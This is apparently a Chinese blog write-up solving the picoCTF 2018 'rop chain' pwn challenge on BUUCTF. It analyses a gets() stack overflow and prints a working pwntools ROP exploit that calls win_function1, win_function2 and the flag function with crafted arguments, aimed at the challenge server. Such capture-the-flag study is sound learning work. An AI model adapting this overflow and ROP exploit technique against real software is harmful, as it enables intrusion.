[BUUCTF]PWN——picoctf_2018_rop chain

最新推荐文章于 2023-10-01 22:28:51 发布
最新推荐文章于 2023-10-01 22:28:51 发布
阅读量980 收藏
点赞数 1
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/109492862
版权

picoctf_2018_rop chain

附件

步骤:

  1. 例行检查,32位,开启了NX保护
    在这里插入图片描述
  2. 试运行一下程序,看到输入太长数据会崩溃
    在这里插入图片描述
  3. 32位ida载入,习惯性的检索程序里的字符串,看见了flag.txt,双击跟进
    在这里插入图片描述
    看到程序将flag读入到了参数s里面,满足条件win1&&win2 &&a1==-59039827的条件,就能读出flag
  4. 从main函数开始看程序
    在这里插入图片描述
    vuln()函数
    在这里插入图片描述
    gets函数输入,没有限制读入长度,存在溢出漏洞,覆盖ret为flag函数地址,之后想办法去满足那个if判断即可获得flag
    在程序里找到了给win1,win2赋值的函数
    win_function1函数直接给win1赋值成了1
    在这里插入图片描述
    win_function2函数当满足条件的时候会将win2赋值为1
    在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
利用思路,首先溢出后覆盖ret为function1函数地址,将win1赋值为1,之后跳转到function2的地址,a1是传入的参数,将a1传入即可满足条件去设置win的值为1,之后去执行flag函数,if要满足的条件之前都设置好了,可以直接读出flag

from pwn import *

r = remote("node3.buuoj.cn", 26602)

win_function1 = 0x080485CB
win_function2 = 0x080485D8
flag = 0x0804862B

payload = "a" * 0x1c
payload += p32(win_function1)
payload += p32(win_function2) + p32(flag) + p32(0xBAAAAAAD) + p32(0xDEADBAAD)
r.sendlineafter("input> ", payload)

r.interactive()

在这里插入图片描述

Angel~Yan
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
BUUCTFpicoctf_2018_rop chain(write up)
qq_44768749的博客
08-26 1183
BUUCTFpicoctf_2018_rop chain0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp关键代码说明 0x01 文件分析 32位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 输入一串字符串,根据题名也知道需要构造ROP 0x03 IDA 主函数 vuln函数 漏洞点:没有限制输入字符串长度 flag函数 win_function1函数 win_function2函数 0x04 思路 flag函数为后门函数
BUUCTFPWNpicoctf_2018_rop chain
m0_55368674的博客
01-19 187
ret2text
buuctf PicoCTF_2018_rop_chain
FUCKING12的博客
02-22 3301
PicoCTF_2018_rop_chain 没什么好说的就是一个rop链构造 上代码 from pwn import * #node4.buuoj.cn:25469 #io=remote("node4.buuoj.cn",25469) io=process("./PicoCTF_2018_rop_chain") elf=ELF('./PicoCTF_2018_rop_chain') context.log_level='debug' #io.recvline("Enter your input>
PicoCTF_2018_rop_chain
m0sway的博客
11-24 634
PicoCTF_2018_rop_chain 使用checksec查看: 只开启了栈不可执行,放入IDA中查看: 主函数中直接给出了漏洞函数,跟进查看: 很明显gets()函数存在一个栈溢出,距离ebp0x18 查看发现存在flag.txt字符串,跟进可以发现函数falg,: 将flag读入到了参数s里面,满足条件win1&&win2 &&a1==-59039827的条件,就能读出flag 找到win1赋值的函数: 发现win1已经被赋值1,可以不用管, 接着看wi
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 396
buuctf-pwn 001-016题wp
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
picoctf_2018_shellcode
最新发布
qq_62887641的博客
10-01 258
32位,啥都没开这个看着挺大的,直接来个ROPchain,还真有,然后让我看看溢出点main函数无法编译,(得看汇编了(但是我们可以反汇编vuln函数vuln很简单,但是a1在栈中的位置我们看看main传了什么进去把var_A0传入,也就是我们输入的位置,从var_A0开始写入在观察一下main的汇编发现一个东西在main的后面有个也就是说,我们写的东西能直接执行,并且也没开NX。
buuctf|pwn-铁人三项(第五赛区)_2018_rop-wp
l2645470582_的博客
11-09 689
1.检查保护机制 2.我们用32位的IDA打开该文件 shift+f12查看关键字符串,没有发现关键字符串 3.我们查看main函数里面的内容 我们发现有两个函数 进入第一个函数 进入第二个函数 在第二个函数里面发现buf溢出,buf有0x88个字节,但是read()函数读取了0x100个字节 4.system("/bin/sh") 我们在文件中没有找到可以拿到shellcode权限 所以我们要用libc,计算偏移量,拿到shellcode权限...
orw (pwnable_orw和[V&N2020 公开赛]warmup)和 picoctf_2018_rop chain 记录笔记
carol2358的博客
05-21 1367
学到一种新的做法,orw(open,read,write),可以用在system,fork syscall(不能打开子进程,需要在当前进程里读入flag并输出) 和execve被禁的情况下打印出flag,还有seccomp 虽然还不太懂,但先记录一下目前的理解 seccomp安全机制能使一个进程进入到一种“安全”运行模式,该模式下的进程只能调用4种系统调用(system call),即 read(), write(), exit() 和 sigreturn(),否则进程便会被终止。 著作权归作者所有。商业转
2021 Picoctf pwn部分wp
weixin_46521144的博客
07-18 510
首先说一下,是参考了校内学长的复盘讲解hhh,这也是第一次直接接触在线的ctf而不是靶场。 Gauntlet1 在ida里面看一下。这三道Gauntlet都是一个类型的,漏洞都是一个格式化字符串+栈溢出。 那就很容易直接把shellcraft.sh()写道栈上,因为一开始给打印了背写区域的起始位置并且使可执行的栈,一溢出就会跳转到我们写的shellcraft上面执行。注意中间还要有个格式化字符串的额send,不要忘了,之前卡在这里好久啊。。。 exp from pwn import * context.
buuoj Pwn writeup 176-180
yongbaoii的博客
06-09 290
176 jarvisoj_itemboard 177 asis2016_b00ks 178 actf_2019_onerepeater 179 ciscn_2019_s_8 180 starctf_2019_girlfriend
BUUCTF-PWN刷题记录-7
weixin_44145820的博客
04-15 882
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
[BUUCTF]PWN——ciscn_2019_n_3
mcmuyanga的博客
01-06 823
ciscn_2019_n_3 附件 步骤 例行检查,32位,开启了nx和canary保护 本地试运行一下,经典的堆题的菜单 3.32位ida载入 new(),申请了两个chunk,第一个chunk(13行)固定大小0xC,存放的是rec_int_print和rec_int_free函数的地址,第二个chunk(32行),是我们申请的chunk del() 如果值是整数,直接 free chunk 如果值是字符串,则 chunk 和存储字符串的 chunk 都要 free。注意这里只是进行了
ROP;CTF-pwn 详解writeup;one_gadget使用;静态库;静态链接
CHERRY_cong的博客
05-01 908
ropme_writeup 文章目录ropme_writeup任务描述检查保护观察栈溢出地址实现系统调用ROPgadget任务一思路open(file,O_RDWR)read(4,addr,32)write(1,addr,32)exp1.py任务一运行截图任务二思路exp2.py任务二运行截图 任务描述 本实验提供了一个带有漏洞的二进制程序(ropme),这个二进制程序将你提供的文件名作为参数传入以后就会发生一个栈缓冲区溢出。请使用ROP方法编写利用,在不需要额外操作标准输入的情况下,完成以下至少一项任务
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2
Y_peak的博客
02-14 260
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2 题目地址:https://buuoj.cn/challenges#[HarekazeCTF2019]baby_rop2 checksec一下,64位,开启NX,应该要用到ROPgadget,先看看 在IDA中 思路 利用printf先leek出来一个地址,这里选用了read的地址。找到libc,计算偏移,最终算出,system函数地址和’/bin/sh’字符串的地址。由于是64位,注意寄存器储存参数。(参数小于等于
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值